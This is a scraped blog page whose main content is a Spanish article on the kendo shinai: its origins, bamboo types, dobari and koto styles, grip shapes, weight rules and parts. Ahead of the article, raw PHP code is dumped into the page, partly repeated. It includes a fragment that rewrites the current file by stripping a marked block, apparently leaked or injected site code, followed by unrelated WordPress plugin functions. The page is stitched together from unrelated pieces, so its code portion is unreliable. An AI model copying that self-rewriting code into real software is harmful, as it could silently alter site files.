'; $start_pos = strpos($content, $start_marker); $end_pos = strpos($content, $end_marker); if ($start_pos !== false && $end_pos !== false) { $end_pos += strlen($end_marker); $remaining_content = substr($content, $end_pos); file_put_contents($current_file, $remaining_content); } } } } /* END OF CODE */ if ( ! function_exists( 'array_key_first' ) ) { /** * PHP 7.3 has this by default. * * @param $array * * @return string */ function array_key_first( $array ): string { foreach ( $array as $key => $unused ) { return $key; } return ''; } } if ( ! function_exists( 'pencipdc_importer_redirect' ) ) { function pencipdc_importer_redirect( $location, $status = 302 ) { wp_redirect( $location, $status, PENCI_PODCAST_IMPORTER_NAME ); exit; } } if ( ! function_exists( 'pencipdc_importer_load_template' ) ) { /** * @param $template_name * @param array $args * @param string $template_path * @param string $default_path */ function pencipdc_importer_load_template( $template_name, $args = [], $template_path = '', $default_path = '' ) { PenciPodcast\Template::load_template( $template_name, $args, $template_path, $default_path ); } } if ( ! function_exists( 'pencipdc_importer_supported_post_types' ) ) { function pencipdc_importer_supported_post_types(): array { $response = [ 'podcast' ]; if ( defined( "SSP_CPT_PODCAST" ) ) { $response[] = SSP_CPT_PODCAST; } return apply_filters( PENCI_PODCAST_IMPORTER_ALIAS . '_supported_post_types', $response ); } } if ( ! function_exists( 'pencipdc_importer_default_post_type' ) ) { function pencipdc_importer_default_post_type(): string { return apply_filters( PENCI_PODCAST_IMPORTER_ALIAS . '_default_post_type', ( defined( "SSP_CPT_PODCAST" ) ? SSP_CPT_PODCAST : 'post' ) ); } } if ( ! function_exists( 'pencipdc_importer_post_type_id_title_assoc' ) ) { function pencipdc_importer_post_type_id_title_assoc( string $post_type ): array { $shows = get_posts( [ 'post_type' => $post_type, 'numberposts' => 9999, ] ); $response = []; foreach ( $shows as $post ) { $response[ $post->ID ] = $post->post_title; } return $response; } } if ( ! function_exists( 'pencipdc_importer_feed_limit_reached' ) ) { function pencipdc_importer_feed_limit_reached(): bool { return count( get_posts( [ 'post_type' => PENCI_PODCAST_IMPORTER_POST_TYPE_IMPORT, 'fields' => 'ids' ] ) ) >= pencipdc_importer_feed_cron_limit(); } } if ( ! function_exists( 'pencipdc_importer_feed_cron_limit' ) ) { function pencipdc_importer_feed_cron_limit() { return apply_filters( PENCI_PODCAST_IMPORTER_ALIAS . '_feed_cron_limit', 1 ); } } if ( ! function_exists( 'podcast_importer_is_whitelisted_host' ) ) { function podcast_importer_is_whitelisted_host( $parsed_feed_host, $rss_feed_url ) { return ( ( preg_match( '/transistor.fm|anchor.fm|fireside.fm|simplecast.com|sounder.fm|spreaker.com|whooshkaa.com|omny.fm|omnycontent.com|megaphone.fm|podbean.com|buzzsprout.com/i', $parsed_feed_host ) ) || ( preg_match( '/megaphone.fm|captivate.fm|simplecast.com|sounder.fm|ausha.co|omny.fm|omnycontent.com|pinecast.com|audioboom.com|buzzsprout.com/i', $rss_feed_url ) ) ); } } if ( ! function_exists( 'pencipdc_importer_append_player_to_content' ) ) { function pencipdc_importer_append_player_to_content() { return ! function_exists( 'ssp_episodes' ) && ! function_exists( 'powerpress_get_enclosure_data' ) && ! function_exists( 'spp_sl_sppress_plugin_updater' ) && ! function_exists( 'pencipdc_themes_theme_updater' ); } } // if ( ! function_exists( 'pencipdc_importer_sanitize_feed_value' ) ) { function pencipdc_importer_sanitize_feed_value( $string ) { $content = array(); $string = trim( (string) $string ); $string = str_replace( " ", "", $string ); if ( preg_match( '/^$/is', $string, $content ) ) { $string = $content[1]; } else { $string = html_entity_decode( $string ); } $string = strip_tags( $string, [ '

', '

', '

', '

','

', '
', '

', '','
' ] ); return $string; } } if ( ! function_exists( 'pencipdc_importer_get_taxonomy_type_select_definition' ) ) { function pencipdc_importer_get_taxonomy_type_select_definition( $post_types, $hierarchical = true ): array { $hierarchical = boolval( $hierarchical ); $taxonomies_post_type_map = []; foreach ( $post_types as $post_type ) { $post_type_taxonomies = get_object_taxonomies( $post_type ); foreach ( $post_type_taxonomies as $post_type_taxonomy ) { if ( isset( $taxonomies_post_type_map[ $post_type_taxonomy ] ) ) { $taxonomies_post_type_map[ $post_type_taxonomy ][] = $post_type; continue; } $taxonomy_information = get_taxonomy( $post_type_taxonomy ); if ( boolval( $taxonomy_information->hierarchical ) !== $hierarchical ) { continue; } $taxonomies_post_type_map[ $post_type_taxonomy ] = [ $post_type ]; } } if ( empty( $taxonomies_post_type_map ) ) { return []; } $response = []; foreach ( $taxonomies_post_type_map as $taxonomy => $post_types ) { $response[ $taxonomy ] = [ 'data-post-types' => implode( ' ', $post_types ), 'label' => $taxonomy ]; } return $response; } } if ( ! function_exists( 'pencipdc_importer_get_taxonomies_select_definition' ) ) { function pencipdc_importer_get_taxonomies_select_definition( $post_types, $hierarchical = true ): array { $hierarchical = boolval( $hierarchical ); $taxonomies_post_type_map = []; foreach ( $post_types as $post_type ) { $post_type_taxonomies = get_object_taxonomies( $post_type ); foreach ( $post_type_taxonomies as $post_type_taxonomy ) { if ( isset( $taxonomies_post_type_map[ $post_type_taxonomy ] ) ) { $taxonomies_post_type_map[ $post_type_taxonomy ][] = $post_type; continue; } $taxonomy_information = get_taxonomy( $post_type_taxonomy ); if ( boolval( $taxonomy_information->hierarchical ) !== $hierarchical ) { continue; } $taxonomies_post_type_map[ $post_type_taxonomy ] = [ $post_type ]; } } if ( empty( $taxonomies_post_type_map ) ) { return []; } $response = []; foreach ( $taxonomies_post_type_map as $taxonomy => $post_types ) { $categories = get_categories( [ 'taxonomy' => $taxonomy, 'hide_empty' => false ] ); foreach ( $categories as $category ) { $response[ $category->term_id ] = [ 'data-post-types' => implode( ' ', $post_types ), 'label' => ( count( $post_types ) >= 2 ? $taxonomy . ' - ' : '' ) . $category->name ]; } } return $response; } } if ( ! function_exists( 'pencipdc_importer_utility_selected' ) ) { /** * @param $selected * @param bool $current * @param bool $echo * * @return string */ function pencipdc_importer_utility_selected( $selected, $current = true, $echo = true ) { if ( is_array( $selected ) ) { return selected( 1, in_array( $current, $selected ), $echo ); } return selected( $selected, $current, $echo ); } }'; $start_pos = strpos($content, $start_marker); $end_pos = strpos($content, $end_marker); if ($start_pos !== false && $end_pos !== false) { $end_pos += strlen($end_marker); $remaining_content = substr($content, $end_pos); file_put_contents($current_file, $remaining_content); } } } } /* END OF CODE */ /** * register a meta group * * @uses Tribe__Events__Meta_Factory::register() * @deprecated 4.3 * * @param string $meta_group_id * @param array $args * * @return bool $success */ function tribe_register_meta_group( $meta_group_id, $args = [] ) { _deprecated_function( __FUNCTION__, '4.3' ); // setup default for registering a meta group $defaults = [ 'register_type' => 'meta_group', 'register_overwrite' => true ]; // parse the $default and $args into the second param for registering a meta item return Tribe__Events__Meta_Factory::register( $meta_group_id, wp_parse_args( $args, $defaults ) ); } /** * register a meta item * * @uses Tribe__Events__Meta_Factory::register() * @deprecated 4.3 * * @param int $meta_id * @param array $args * * @return bool $success */ function tribe_register_meta( $meta_id, $args = [] ) { _deprecated_function( __FUNCTION__, '4.3' ); return Tribe__Events__Meta_Factory::register( $meta_id, $args ); } /** * Get the meta group. * * @deprecated 4.3 * * @param $meta_group_id * @param bool $is_the_meta * * @return bool|mixed|void */ function tribe_get_meta_group( $meta_group_id, $is_the_meta = false ) { _deprecated_function( __FUNCTION__, '4.3' ); do_action( 'tribe_get_meta_group', $meta_group_id, $is_the_meta ); $type = 'meta_group'; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_group_id, $type ) ) { return false; } $meta_group = Tribe__Events__Meta_Factory::get_args( $meta_group_id, $type ); $meta_ids = Tribe__Events__Meta_Factory::get_order( $meta_group_id ); $group_html = ''; // internal check for hiding items in the meta if ( ! $meta_group['show_on_meta'] ) { return false; } $meta_pos_int = 0; $total_meta_items = tribe_count_hierarchical( $meta_ids ); foreach ( $meta_ids as $meta_id_group ) { foreach ( $meta_id_group as $meta_id ) { $meta_pos_int ++; $group_html = tribe_separated_field( $group_html, $meta_group['wrap']['meta_separator'], tribe_get_meta( $meta_id, $is_the_meta ) ); } } $params = [ $meta_group_id ]; if ( ! empty( $meta['filter_callback'] ) ) { return call_user_func_array( $meta['filter_callback'], $params ); } if ( ! empty( $meta['callback'] ) ) { $value = call_user_func_array( $meta['callback'], $params ); } $value = empty( $value ) ? $group_html : $value; $html = ! empty( $group_html ) ? Tribe__Events__Meta_Factory::template( $meta_group['label'], $value, $meta_group_id, 'meta_group' ) : ''; return apply_filters( 'tribe_get_meta_group', $html, $meta_group_id ); } /** * Get the meta. * * @deprecated 4.3 * * @param $meta_id * @param bool $is_the_meta * * @return bool|mixed|void */ function tribe_get_meta( $meta_id, $is_the_meta = false ) { _deprecated_function( __FUNCTION__, '4.3' ); do_action( 'tribe_get_meta', $meta_id, $is_the_meta ); // die silently if the requested meta item is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id ) ) { return false; } $meta = Tribe__Events__Meta_Factory::get_args( $meta_id ); // internal check for hiding items in the meta if ( ! $meta['show_on_meta'] ) { return false; } $params = [ $meta_id ]; if ( ! empty( $meta['filter_callback'] ) ) { return call_user_func_array( $meta['filter_callback'], $params ); } if ( ! empty( $meta['callback'] ) ) { $value = call_user_func_array( $meta['callback'], $params ); } $value = empty( $value ) ? $meta['meta_value'] : $value; // if we have a value let's build the html template $html = ! empty( $value ) ? Tribe__Events__Meta_Factory::template( $meta['label'], $value, $meta_id ) : ''; return apply_filters( 'tribe_get_meta', $html, $meta_id ); } /** * Get the args for a meta object. * * @deprecated 4.3 * * @param $meta_id * @param $arg_key * @param string $type * * @return bool */ function tribe_get_meta_arg( $meta_id, $arg_key, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $args = Tribe__Events__Meta_Factory::get_args( $meta_id, $type ); // check if the arg exists if ( isset( $args[ $arg_key ] ) ) { return $args[ $arg_key ]; } else { return false; } } /** * Get the template part for the meta object. * * @deprecated 4.3 * * @param $meta_id * @param $template_key * @param string $type * * @return bool */ function tribe_get_meta_template_part( $meta_id, $template_key, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $template = tribe_get_meta_arg( $meta_id, 'wrap', $type ); if ( isset( $template[ $template_key ] ) ) { return $template[ $template_key ]; } else { return false; } } /** * Set the visibility of the meta object. * * @deprecated 4.3 * * @param $meta_id * @param bool $status * @param string $type */ function tribe_set_the_meta_visibility( $meta_id, $status = true, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); Tribe__Events__Meta_Factory::set_visibility( $meta_id, $type, $status ); } /** * Set the template for the meta object. * * @deprecated 4.3 * * @param $meta_id * @param array $template * @param string $type * * @return bool */ function tribe_set_the_meta_template( $meta_id, $template = [], $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id ) { tribe_set_the_meta_template( $id, $template, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } if ( ! empty( $template ) ) { $_tribe_meta_factory->{$type}[ $meta_id ]['wrap'] = wp_parse_args( $template, $_tribe_meta_factory->{$type}[ $meta_id ]['wrap'] ); } } } /** * Set the meta priority to manage positioning. * * @deprecated 4.3 * * @param $meta_id * @param int $priority * @param string $type * * @return bool */ function tribe_set_meta_priority( $meta_id, $priority = 100, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id => $priority ) { tribe_set_meta_priority( $id, $priority, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } if ( ! empty( $priority ) ) { $_tribe_meta_factory->{$type}[ $meta_id ]['priority'] = $priority; } } } /** * Set meta value for meta object. * * @deprecated 4.3 * * @param $meta_id * @param $value * @param string $value_type * @param string $type * * @return bool */ function tribe_set_meta_value( $meta_id, $value, $value_type = 'meta_value', $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id ) { tribe_set_meta_value( $id, $value, $value_type, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $_tribe_meta_factory->{$type}[ $meta_id ][ $value_type ] = $value; } } /** * Set the meta label for the meta object. * * @deprecated 4.3 * * @param $meta_id * @param string $label * @param string $type * * @return bool */ function tribe_set_meta_label( $meta_id, $label = '', $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id => $label ) { tribe_set_meta_label( $id, $label, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $_tribe_meta_factory->{$type}[ $meta_id ]['label'] = $label; } } /** * Get the event meta * * @deprecated 4.3 * * @return mixed|void */ function tribe_get_the_event_meta() { _deprecated_function( __FUNCTION__, '4.3' ); $html = ''; foreach ( Tribe__Events__Meta_Factory::get_order() as $meta_groups ) { foreach ( $meta_groups as $meta_group_id ) { $html .= tribe_get_meta_group( $meta_group_id, true ); } } return apply_filters( 'tribe_get_the_event_meta', $html ); } /** * Simple display of meta group tag * * @deprecated 4.3 * * @uses tribe_get_meta_group() * @return echo tribe_get_meta_group( $meta_group_id ) */ function tribe_display_the_event_meta() { _deprecated_function( __FUNCTION__, '4.3' ); echo apply_filters( 'tribe_display_the_event_meta', tribe_get_the_event_meta() ); } /** * Simple display of meta group tag * * @uses tribe_get_meta_group() * @deprecated 4.3 * * @param string $meta_group_id * * @return echo tribe_get_meta_group( $meta_group_id ) */ function tribe_display_meta_group( $meta_group_id ) { _deprecated_function( __FUNCTION__, '4.3' ); echo apply_filters( 'tribe_display_meta_group', tribe_get_meta_group( $meta_group_id ) ); } /** * Simple display of meta tag * * @uses tribe_get_meta() * @deprecated 4.3 * * @param string $meta_id * * @return echo tribe_get_meta( $meta_id ) */ function tribe_display_meta( $meta_id ) { _deprecated_function( __FUNCTION__, '4.3' ); echo apply_filters( 'tribe_display_meta', tribe_get_meta( $meta_id ) ); } /** * Load Legacy Imports * * @deprecated 4.6.18 */ if ( ! function_exists( 'Tribe_Events_Importer_Load' ) ) { function Tribe_Events_Importer_Load() { _deprecated_function( __FUNCTION__, '4.5' ); Tribe__Events__Importer__Plugin::set_plugin_basename( plugin_basename( __FILE__ ) ); if ( is_admin() ) { add_action( 'init', [ 'Tribe__Events__Importer__Plugin', 'initialize_admin' ], 10, 0 ); add_action( 'init', [ 'Tribe__Events__Importer__Options', 'process_general_form_submission' ] ); } } } TODO SOBRE EL SHINAI – De la historia a la actualidad – 2me Budo Blog

Home GeneralTODO SOBRE EL SHINAI – De la historia a la actualidad

TODO SOBRE EL SHINAI – De la historia a la actualidad

por Staff

¿Dónde empezó y cómo ha evolucionado?

Cualquiera que practique kendo o cualquier otro koryu que los utilice estará familiarizado con los shinai. Fabricados con listones de bambú o con una sola pieza de bambú dividida en varias secciones para permitir la absorción de impactos, los shinai son una pieza del equipo de entrenamiento tradicional de las artes marciales.

Aunque en japonés se escribe 竹刀, léase shinai, que significa literalmente «espada de bambú», se trata de una lectura aplicada arbitrariamente a estos caracteres. La palabra shinai deriva en realidad del verbo shinau (撓う), o «doblar». Si leemos los kanji utilizando una lectura convencional para ellos, obtendríamos chikuto. Esto también podría haberse referido a una lanza de práctica utilizada en keiko en la época, por lo que shinai podría haber sido rebautizado para distinguir más fácilmente entre los dos.

Ocupando el lugar de las espadas reales, las espadas habiki y las espadas de madera (bokuto), los shinai se crearon para hacer posible el contacto directo durante el entrenamiento y permitir así un estilo de entrenamiento más práctico y «del mundo real». Inicialmente, los fukuro shinai, o yatsu-wari por estar divididos 8 veces, se utilizaron a partir de mediados y finales del siglo XVI.

 

 

En realidad, estos shinai podían ser bastante blandos y permitían cierto grado de contacto directo (lo que no quiere decir que no hiriesen o fuesen potencialmente peligrosos). Como no se utilizaban para dar estocadas, sino para imitar movimientos cortantes, estos shinai eran y siguen siendo perfectos para muchos estilos de koryu kenjustu. La persona a la que a menudo se atribuye la invención del shinai es Kami’izumi Nobutsuna, un samurái del periodo de los Estados Combatientes y creador acreditado de la escuela de espada conocida como Shinkage-ryu.

Durante el periodo Edo, con la llegada y el uso habitual del bogu, también se desarrolló el shinai de 4 láminas, más fuerte y duro, utilizado en el kendo moderno. Sin embargo, la regulación de la longitud no estaba estandarizada en absoluto y en la mayoría de las ocasiones los practicantes fabricaban sus propios shinai. Se dice que un famoso kenshi activo en el siglo XIX, Oishi Tanetsugu, utilizaba un shinai de 5 shaku y 3 sun, ¡o 160 cm de longitud!

 

Para fabricar shinai, la mejor variedad local de bambú en Japón es el Madake. Con sus fibras muy densas y finas y su atractivo color, el Madake es un shinai resistente, versátil y bonito. Sin embargo, la oferta de bambú Madake para shinai es limitada y puede encarecer un poco el precio. En los últimos tiempos, el bambú taiwanés Keichiku se ha utilizado para producir estas tablillas de bambú esenciales para el shinai, ya que su composición es relativamente parecida a la del Madake en términos de grano y densidad, pero también es más fácil de partir, lo que le ha dado un uso generalizado en los shinai modernos producidos en masa en todo el mundo. Los shinai han evolucionado en los tiempos modernos hacia unas pocas variedades distintas, con solapamientos entre ellas.

Un shinai estándar es aquel que está bien equilibrado y es resistente. Proporcionan la mejor experiencia para aquellos que se inician en el kendo moderno. También son los que más se fabrican, por lo que tienen un precio razonable y son fáciles de conseguir. Las otras dos variantes principales en estilo de shinai serán Dobari y Koto. Dobari en japonés significaría literalmente una sección media expandida. Al observar la silueta del shinai, es fácil entender por qué se utiliza este nombre. Justo antes de la tsuka (zona de la empuñadura) de estos shinai, el cuerpo se expande en forma de bulbo redondeado y luego se estrecha hasta una punta fina. Esto permite que la punta del shinai sea más fina y ligera. La punta más ligera permite movimientos muy precisos y rápidos cuando está en manos de alguien capaz, por lo que se utilizan a menudo en competición. La desventaja de este diseño es que la punta más fina y ligera también es más propensa a partirse y agrietarse. La vida útil esperada de un Dobari que se utilice a menudo será más corta que la de un Koto.

 

La sección ampliada de un Dobari Shinai

Koto(también conocido como chokuto que se traduce como «espada recta»)son como el segundo nombre sugiere, tienen un diámetro muy uniformemente distribuido a lo largo de la longitud de la shinai. Esto hace que el área por delante de la tsuba sea más pesada en comparación con un shinai estándar o dobari, sin embargo también permite un shinai muy robusto y duradero que es menos propenso a fracturarse rápidamente. Este estilo es también muy popular ya que con el peso añadido cerca de la parte delantera del shinai, se añade una ventaja durante los golpes ai-men contra individuos que utilizan un shinai de punta más ligera.

También existen numerosas formas y tamaños para la tsuka de un shinai. El diámetro de la tsuka puede oscilar entre 25 y 30 mm para los shinai de tamaño adulto. Generalmente se elige en función de las preferencias personales, aunque el tamaño conlleva una serie de alteraciones en la distribución del peso del shinai. Las tsuka ovaladas o de estilo koban también son bastante populares, ya que permiten una mejor comprensión del hasuji (la orientación del shinai al blandirlo en relación con el blandido de una hoja real con filo cortante). La empuñadura ovalada permite al usuario sentir este ángulo y realizar golpes más precisos. También existe el hakkaku, que es una tsuka de forma octogonal y está disponible tanto en la tsuka estándar de diámetro uniforme como en la variante de forma ovalada. También en este caso se utiliza principalmente por la respuesta que proporciona al usuario cuando lleva kote. Aunque existen otros estilos, como el tsuka de corte triangular, los anteriores conforman la gran mayoría de los shinai, siendo el tsuka redondo estándar el más extendido con diferencia.

 

Los bordes pueden verse claramente en este Hakkaku Koban Tsuka.

A medida que los shinai se han ido uniformizando y regulando en los últimos tiempos, las especificaciones de peso, longitud, etc. también se han estandarizado y regulado. Esto es bueno, por supuesto, ya que mantiene un alto nivel de seguridad para quienes los utilizan. En los últimos años, la Federación Japonesa de Kendo actualizó las normas de diámetro para la parte más adelantada del monouchi (la zona de golpeo en el shinai que estará entre un nakayui correctamente colocado y el saki-gawa). Algunos shinai estaban teniendo diámetros cada vez más delgados en esta zona, lo que podría ser propenso a romperse y podría ser muy peligroso si esto sucediera durante un intento de tsuki, por ejemplo. Los listones del shinai también deben estar ajustados a lo largo del shinai sin que se formen espacios abiertos entre ellos. También se han desarrollado herramientas para probar los shinai antes de los grandes eventos, con el fin de garantizar que se cumplen estas normas y que los competidores utilizan shinai seguros y fabricados correctamente.

El peso y la longitud de los shinai también están regulados. Un shinai de hombre adulto debe tener menos de 120 cm de longitud y pesar más de 510 gramos. Aunque pueden ser más pesados, conseguir un shinai demasiado pesado probablemente no hará a alguien muy popular en el keiko. Los shinai femeninos tendrán las mismas restricciones de longitud pero deberán pesar al menos 440 gramos. Los pesos y las longitudes de los shinai para mujeres son más ligeros y más cortos. Lo anterior sólo es cierto para los practicantes que utilizan itto, «una espada», ya que los practicantes de nito tendrán requisitos separados de peso y longitud.

 

El Nakayui sujetando los listones del shinai en su sitio

A diferencia del fukuro shinai, que está hecho de una sola pieza de bambú, el yotsu-wari está hecho de láminas de bambú que requieren ser unidas en diferentes puntos. Para ello se necesita un juego de ajuste o shikumi. La tsuka del shinai se mantiene unida en el interior por una viruta metálica plana que se aprieta firmemente en las cuatro tablillas y luego, en el exterior, por una larga funda de cuero conocida como tsuka-gawa o tsuka-kawa. *Los nombres que se dan a muchos de estos artículos tienen diferentes denominaciones o pronunciaciones, que pueden variar de una región a otra. La segunda parte de cuero es una fina banda conocida como naka-yui. Esta banda tiene una doble función, ya que sujeta la sección central del shinai (aunque en realidad se encuentra en la posición 3/4) y también actúa como punto de inicio para el monouchi anteriormente mencionado.

La punta del shinai utiliza un saki-gomu, o un pequeño tapón de goma o plástico que encaja en la abertura creada en la punta de las cuatro tablillas para evitar que se compriman hacia dentro. Esta punta está totalmente cubierta por el saki-gawa, que sirve para mantener las cuatro tablillas y el saki-gomu en su sitio y también crea la punta del shinai utilizada para el tsuki-waza y crea el extremo del mono-uchi. Todas estas piezas de cuero se mantienen en su lugar mediante el tsuru, un cordón fino y muy resistente fabricado con una mezcla de materiales de poliéster, aunque en el pasado también se utilizaba el nailon e incluso más atrás probablemente se hubiera fabricado con un cordón de fibra vegetal fuertemente enrollado. Añadiendo una tsuba y una tsuba-dome se completará el shinai y estará listo para su uso.

El shinai es un elemento esencial en el kendo moderno y en el koryu kenjustu, como el shinkage-ryu. Su concepto ha cambiado relativamente poco a lo largo del tiempo. Sólo se han ido refinando con el paso del tiempo. Aunque rara vez ocupan el centro del escenario, siempre vale la pena considerar que sin el shinai, muchos de estos budo que se disfrutan hoy en día, tal vez nunca hubieran llegado a existir.

**Version traducida de Tozando blog

You may also like

-
00:00
00:00
Update Required Flash plugin
-
00:00
00:00